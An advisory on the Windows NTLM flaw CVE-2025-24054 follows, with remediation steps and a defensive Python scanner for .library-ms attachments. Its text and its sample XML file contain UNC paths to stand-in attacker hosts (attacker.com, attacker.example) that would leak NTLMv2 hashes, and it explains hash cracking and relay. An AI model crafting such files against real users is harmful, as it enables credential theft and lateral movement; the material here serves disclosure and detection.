What is Windows NTLM?
Microsoft Windows is the world's most widely deployed desktop operating system, used by over a billion devices in enterprise, government, and consumer environments. NTLM (NT LAN Manager) is a legacy authentication protocol retained in all modern Windows versions for backward compatibility with older systems. Despite being superseded by Kerberos in domain environments, NTLM remains active on most enterprise networks — particularly for workgroup authentication, SMB file sharing, and HTTP/WebDAV — and has a long history of abuse in credential capture and relay attacks.
Overview
CVE-2025-24054 is a spoofing vulnerability in Windows NTLM that allows an unauthenticated attacker to capture the NTLMv2 credential hash of any user who opens a folder containing a specially crafted file. No double-click or explicit file open is required — simply navigating to the containing directory in Windows Explorer triggers the NTLM authentication handshake to an attacker-controlled server.
Patched in the March 2025 Patch Tuesday release, the flaw was actively exploited in campaigns targeting Eastern European government and energy sector organizations within days of public disclosure. Captured hashes can be cracked offline or immediately relayed to other services accepting NTLM authentication, enabling lateral movement within a network.
Affected Versions
| Product | Vulnerable | Fixed (KB) |
|---|---|---|
| Windows 10 (all editions) | Prior to March 2025 Patch Tuesday | KB5053606 |
| Windows 11 (all editions) | Prior to March 2025 Patch Tuesday | KB5053602 |
| Windows Server 2016 | Prior to March 2025 Patch Tuesday | KB5053594 |
| Windows Server 2019 | Prior to March 2025 Patch Tuesday | KB5053596 |
| Windows Server 2022 | Prior to March 2025 Patch Tuesday | KB5053603 |
| Windows Server 2025 | Prior to March 2025 Patch Tuesday | KB5053598 |
| Windows Server 2012 R2 (ESU) | Prior to March 2025 Patch Tuesday | KB5053891 |
Technical Details
The vulnerability exists in how Windows Explorer and shell components handle .library-ms and related Windows metadata files. These files can contain UNC path references (e.g., \\attacker.com\share) that Windows automatically resolves when the containing folder is opened. Resolution triggers an outbound NTLM authentication attempt to the remote server, sending the user's NTLMv2 hash.
CWE-73 (External Control of File Name or Path) captures the root cause: the shell resolves attacker-supplied remote UNC paths embedded in metadata files without user awareness or consent. The resulting NTLMv2 hash can be:
- Cracked offline — NTLMv2 hashes are susceptible to dictionary and brute-force attacks, especially for common or weak passwords.
- Relayed — In an NTLM relay attack, the hash is forwarded in real time to another service (e.g., SMB, LDAP, HTTP) on the victim's network, authenticating as the victim without ever cracking the password.
The CVSS vector (AV:N, PR:N, UI:R) reflects that the attacker needs no privileges but does require the victim to open the malicious folder — typically delivered via a phishing email or embedded in a downloaded archive.
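As an added defensive example (not code from this advisory, Microsoft, or Check Point): a small scanner that a mail gateway or endpoint script could run over a .library-ms attachment to find library locations that would make Explorer contact a remote host, and therefore start the NTLM handshake described above. It assumes the documented Library Description XML schema (the 2009/library namespace and simpleLocation/url elements); corp.example, attacker.example and the sample file are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import urlparse

# Assumption: the file follows Microsoft's Library Description XML schema, where
# each library location is a <simpleLocation><url>...</url></simpleLocation>.
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")          # \\host\share\...
REMOTE_SCHEMES = ("file", "smb", "http", "https", "webdav")

def extract_targets(xml_text: str) -> List[str]:
    """Every location URL declared in the library description, in file order."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iterfind(".//lib:simpleLocation/lib:url", NS) if u.text]

def remote_host(target: str) -> Optional[str]:
    """Host that resolving this location would contact, or None when it is
    local (knownfolder:{GUID}, drive-letter paths and the like)."""
    m = UNC_RE.match(target)
    if m:
        return m.group(1).lower()
    parsed = urlparse(target)
    if parsed.scheme in REMOTE_SCHEMES and parsed.hostname:
        return parsed.hostname.lower()
    return None

def is_trusted(host: str, trusted_suffixes) -> bool:
    """Exact or subdomain match against the organisation's own domains."""
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)

def suspicious_hosts(xml_text: str, trusted_suffixes=("corp.example",)) -> List[str]:
    """Remote hosts the file would authenticate to that are not under a trusted
    domain; a non-empty result is the signal to quarantine the attachment."""
    hosts = {h for h in map(remote_host, extract_targets(xml_text))
             if h and not is_trusted(h, trusted_suffixes)}
    return sorted(hosts)

# Constructed sample: one normal knownfolder location, one internal file
# server, and one location on an external host (the pattern this CVE abuses).
SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription><simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation></searchConnectorDescription>
    <searchConnectorDescription><simpleLocation><url>\\fs01.corp.example\docs</url></simpleLocation></searchConnectorDescription>
    <searchConnectorDescription><simpleLocation><url>\\attacker.example\share</url></simpleLocation></searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
```

Calling suspicious_hosts(SAMPLE) reports only the external host; the knownfolder entry and the internal file server are ignored, so the check can run on every inbound archive without flagging ordinary library files.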
Discovery
Reported to Microsoft through coordinated disclosure and patched in the March 11, 2025 Patch Tuesday release. Exploitation in the wild was documented by Check Point Research, which observed campaigns targeting Polish and Ukrainian government entities beginning shortly after patch publication.
Exploitation Context
Active exploitation was observed within days of the March 2025 Patch Tuesday disclosure. Threat actors distributed crafted .library-ms files inside phishing emails and archive attachments (ZIP, RAR). Upon extraction, simply opening the containing folder in Windows Explorer silently transmitted the victim's NTLMv2 hash to attacker-controlled SMB servers.
Campaigns primarily targeted government agencies, energy sector organizations, and financial institutions in Poland, Ukraine, and surrounding countries. The collected hashes were used in both offline cracking operations and NTLM relay attacks to pivot within victim networks.
Remediation
- Apply the March 2025 Patch Tuesday updates (see KB numbers in the Affected Versions table above).
- Restrict outbound NTLM via Group Policy: configure "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to block or audit external NTLM authentication.
- Block outbound SMB (TCP 445) and WebDAV traffic (TCP 80/443 to non-corporate endpoints) at the network perimeter to prevent hash capture by external servers.
- Enable SMB signing on all Windows clients and servers to reduce the value of captured hashes in relay scenarios.
- Monitor Windows Event Logs (Event ID 4625, 4776) and network logs for NTLM authentication attempts to external or unusual hosts.
- Consider email gateway rules to block archive attachments containing .library-ms, .lnk, or .url files from external senders.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-24054 |
| Vendor / Product | Microsoft — Windows |
| NVD Published | 2025-03-11 |
| NVD Last Modified | 2026-02-13 |
| CVSS 3.1 Score | 6.5 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| Severity | MEDIUM |
| CWE | CWE-73 |
| CISA KEV Added | 2025-04-17 |
| CISA KEV Deadline | 2025-05-08 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2025-03-11 | CVE published; Microsoft Patch Tuesday fix released |
| 2025-04-17 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2025-05-08 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| Microsoft Security Response Center — CVE-2025-24054 | Vendor Advisory |
| NVD — CVE-2025-24054 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |